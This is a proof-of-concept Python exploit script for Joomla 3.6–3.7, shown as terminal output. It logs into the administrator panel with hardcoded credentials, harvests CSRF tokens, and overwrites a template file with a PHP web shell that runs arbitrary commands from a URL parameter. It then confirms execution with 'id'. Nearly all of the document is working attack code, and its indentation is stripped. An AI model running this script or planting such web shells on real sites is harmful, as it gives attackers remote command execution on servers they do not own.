This proof of concept code shows how administrator functionality can be abused in Joomla to upload a shell.
5342f1f41088abee2af959b87cbce235
c@kali:~/src/napalm2.2/modules$ cat shell-joomla.py
#!/usr/bin/env python
# joomla_shellup.py - small script to upload shell in Joomla
#
# 02.05.2017, rewrited: 27.05
# -- hint --
# To exploit this "feature" you will need valid credentials.'
# Based on latest (3.6.5-1) version.'
# Tested also on: 3.7.x
import requests
import re
target = raw_input("[+] Hostname >> ")
print '[+] Checking: ' + str(target)
# initGET
session = requests.session()
initlink = target + '/administrator/index.php'
initsend = session.get(initlink)
initresp = initsend.text
find_token = re.compile('<input type="hidden" name="(.*?)" value="1"/>')
found_token = re.search(find_token, initresp)
if found_token:
initToken = found_token.group(1)
print '[+] Found init token: ' + initToken
print '[+] Preparing login request'
data_login = {
'username':'user',
'passwd':'bitnami',
'lang':'',
'option':'com_login',
'task':'login',
'return':'aW5kZXgucGhw',
initToken:'1'
}
data_link = initlink
doLogin = session.post(data_link, data=data_login)
loginResp = doLogin.text
print '[+] At this stage we should be logged-in as an admin :)'
uplink = target + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA%3D'
filename = 'jsstrings.php'
print '[+] File to change: ' + str(filename)
getnewtoken = session.get(uplink)
getresptoken = getnewtoken.text
newToken = re.compile('<input type="hidden" name="(.*?)" value="1"/>')
newFound = re.search(newToken, getresptoken)
if newFound:
newOneTok = newFound.group(1)
print '[+] Grabbing new token from logged-in user: ' + newOneTok
getjs = target+'/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA%3D'
getjsreq = session.get(getjs)
getjsresp = getjsreq.text
# print getjsresp
print '[+] Shellname: ' + filename
shlink = target + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA='
shdata_up = {
'jform[source]':'<?php system($_GET["x"]);',
'task':'template.apply',
newOneTok:'1',
'jform[extension_id]':'503',
'jform[filename]':'/'+filename
}
shreq = session.post(shlink, data=shdata_up)
path2shell = '/templates/beez3/jsstrings.php?x=id'
print '[+] Shell is ready to use: ' + str(path2shell)
print '[+] Checking:'
shreq = session.get(target + path2shell)
shresp = shreq.text
print shresp
print '\n[+] Module finished.'